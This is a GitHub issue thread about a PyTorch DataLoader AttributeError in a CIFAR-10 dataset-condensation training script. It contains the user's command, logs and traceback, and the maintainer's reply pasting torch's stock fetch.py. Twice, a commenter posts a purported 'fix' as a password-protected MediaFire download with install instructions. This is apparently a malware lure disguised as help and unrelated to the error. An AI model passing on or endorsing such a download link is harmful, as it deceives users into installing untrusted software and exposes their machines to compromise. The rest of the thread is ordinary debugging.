### ISSUE TITLE
hi， AttributeError: 'ImageFolder_FKD_MIX' object has no attribute 'load_batch_config' when I run CIFAR-10 train_fkd.py

### ISSUE THREAD

**Issue by Zhongwei-Luo** [shaoshitong/G_VBSM_Dataset_Condensation#2]
cd /home/zhanglf/lzw/code/GVBSM_spkd ; /usr/bin/env /home/zhanglf/anaconda3/envs/m3d/bin/python /home/zhanglf/.vscode-server/extensions/ms-python.debugpy-2024.8.0/bundled/libs/debugpy/adapter/../../debugpy/launcher 38957 -- /home/zhanglf/lzw/code/GVBSM_spkd/Branch_CIFAR_10/train/train_FKD.py --wandb-project final_rn18_fkd --batch-size 100 --model ResNet18 --cos --loss-type mse_gt --ce-weight 0.15 -j 4 --gradient-accumulation-steps 1 -T 20 --sgd-lr 0.01 --adamw-lr 0.001 --mix-type cutmix --output-dir ./save/final_rn18_fkd/ --train-dir /home/zhanglf/lzw/code/GVBSM_spkd/Branch_CIFAR_10/recover/syn_data/GVBSM_CIFAR_10_Recover_IPC_10 --val-dir /data2 --fkd-path /home/zhanglf/lzw/code/GVBSM_spkd/Branch_CIFAR_10/relabel/FKD_cutmix_fp16FKD_IPC_10 
wandb: Currently logged in as: 485434977 (485434977-shang-hai-jiao-tong). Use `wandb login --relogin` to force relogin
wandb: wandb version 0.17.8 is available!  To upgrade, please run:
wandb:  $ pip install wandb --upgrade
wandb: Tracking run with wandb version 0.16.6
wandb: Run data is saved locally in /home/zhanglf/lzw/code/GVBSM_spkd/wandb/run-20240902_043223-a0x9x09r
wandb: Run `wandb offline` to turn off syncing.
wandb: Syncing run chocolate-dawn-2
wandb: ⭐️ View project at https://wandb.ai/485434977-shang-hai-jiao-tong/final_rn18_fkd
wandb: 🚀 View run at https://wandb.ai/485434977-shang-hai-jiao-tong/final_rn18_fkd/runs/a0x9x09r
======= FKD: dataset info ======
path: /home/zhanglf/lzw/code/GVBSM_spkd/Branch_CIFAR_10/relabel/FKD_cutmix_fp16FKD_IPC_10
num img: 100
batch size: 100
max epoch: 1000
================================
Files already downloaded and verified
load data successfully
=> loading student model 'ResNet18'

Epoch: 0
Traceback (most recent call last):
  File "/home/zhanglf/anaconda3/envs/m3d/lib/python3.9/runpy.py", line 197, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "/home/zhanglf/anaconda3/envs/m3d/lib/python3.9/runpy.py", line 87, in _run_code
    exec(code, run_globals)
  File "/home/zhanglf/.vscode-server/extensions/ms-python.debugpy-2024.8.0/bundled/libs/debugpy/adapter/../../debugpy/launcher/../../debugpy/__main__.py", line 39, in <module>
    cli.main()
  File "/home/zhanglf/.vscode-server/extensions/ms-python.debugpy-2024.8.0/bundled/libs/debugpy/adapter/../../debugpy/launcher/../../debugpy/../debugpy/server/cli.py", line 430, in main
    run()
  File "/home/zhanglf/.vscode-server/extensions/ms-python.debugpy-2024.8.0/bundled/libs/debugpy/adapter/../../debugpy/launcher/../../debugpy/../debugpy/server/cli.py", line 284, in run_file
    runpy.run_path(target, run_name="__main__")
  File "/home/zhanglf/.vscode-server/extensions/ms-python.debugpy-2024.8.0/bundled/libs/debugpy/_vendored/pydevd/_pydevd_bundle/pydevd_runpy.py", line 321, in run_path
    return _run_module_code(code, init_globals, run_name,
  File "/home/zhanglf/.vscode-server/extensions/ms-python.debugpy-2024.8.0/bundled/libs/debugpy/_vendored/pydevd/_pydevd_bundle/pydevd_runpy.py", line 135, in _run_module_code
    _run_code(code, mod_globals, init_globals,
  File "/home/zhanglf/.vscode-server/extensions/ms-python.debugpy-2024.8.0/bundled/libs/debugpy/_vendored/pydevd/_pydevd_bundle/pydevd_runpy.py", line 124, in _run_code
    exec(code, run_globals)
  File "/home/zhanglf/lzw/code/GVBSM_spkd/Branch_CIFAR_10/train/train_FKD.py", line 397, in <module>
    main()
  File "/home/zhanglf/lzw/code/GVBSM_spkd/Branch_CIFAR_10/train/train_FKD.py", line 225, in main
    train(model, args, epoch)
  File "/home/zhanglf/lzw/code/GVBSM_spkd/Branch_CIFAR_10/train/train_FKD.py", line 267, in train
    for batch_idx, batch_data in enumerate(args.train_loader):
  File "/home/zhanglf/anaconda3/envs/m3d/lib/python3.9/site-packages/torch/utils/data/dataloader.py", line 631, in __next__
    data = self._next_data()
  File "/home/zhanglf/anaconda3/envs/m3d/lib/python3.9/site-packages/torch/utils/data/dataloader.py", line 1346, in _next_data
    return self._process_data(data)
  File "/home/zhanglf/anaconda3/envs/m3d/lib/python3.9/site-packages/torch/utils/data/dataloader.py", line 1372, in _process_data
    data.reraise()
  File "/home/zhanglf/anaconda3/envs/m3d/lib/python3.9/site-packages/torch/_utils.py", line 705, in reraise
    raise exception
AttributeError: Caught AttributeError in DataLoader worker process 0.
Original Traceback (most recent call last):
  File "/home/zhanglf/anaconda3/envs/m3d/lib/python3.9/site-packages/torch/utils/data/_utils/worker.py", line 308, in _worker_loop
    data = fetcher.fetch(index)  # type: ignore[possibly-undefined]
  File "/home/zhanglf/anaconda3/envs/m3d/lib/python3.9/site-packages/torch/utils/data/_utils/fetch.py", line 59, in fetch
    mix_index, mix_lam, mix_bbox, soft_label = self.dataset.load_batch_config(possibly_batched_index[0])
AttributeError: 'ImageFolder_FKD_MIX' object has no attribute 'load_batch_config'

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by shaoshitong** [comment]
Hello! Thanks for your question. I believe this issue may be caused by changes you made to the internal files of the torch package. In my computer, the file `torch/utils/data/_utils/fetch.py` does not have any content related to `mix_index, mix_lam, mix_bbox, soft_label = self.dataset.load_batch_config(possibly_batched_index[0])`:

```python
r""""Contains definitions of the methods used by the _BaseDataLoaderIter to fetch
data from an iterable-style or map-style dataset. This logic is shared in both
single- and multi-processing data loading.
"""


class _BaseDatasetFetcher:
    def __init__(self, dataset, auto_collation, collate_fn, drop_last):
        self.dataset = dataset
        self.auto_collation = auto_collation
        self.collate_fn = collate_fn
        self.drop_last = drop_last

    def fetch(self, possibly_batched_index):
        raise NotImplementedError()


class _IterableDatasetFetcher(_BaseDatasetFetcher):
    def __init__(self, dataset, auto_collation, collate_fn, drop_last):
        super().__init__(dataset, auto_collation, collate_fn, drop_last)
        self.dataset_iter = iter(dataset)
        self.ended = False

    def fetch(self, possibly_batched_index):
        if self.ended:
            raise StopIteration

        if self.auto_collation:
            data = []
            for _ in possibly_batched_index:
                try:
                    data.append(next(self.dataset_iter))
                except StopIteration:
                    self.ended = True
                    break
            if len(data) == 0 or (
                self.drop_last and len(data) < len(possibly_batched_index)
            ):
                raise StopIteration
        else:
            data = next(self.dataset_iter)
        return self.collate_fn(data)


class _MapDatasetFetcher(_BaseDatasetFetcher):
    def fetch(self, possibly_batched_index):
        if self.auto_collation:
            if hasattr(self.dataset, "__getitems__") and self.dataset.__getitems__:
                data = self.dataset.__getitems__(possibly_batched_index)
            else:
                data = [self.dataset[idx] for idx in possibly_batched_index]
        else:
            data = self.dataset[possibly_batched_index]
        return self.collate_fn(data)

```
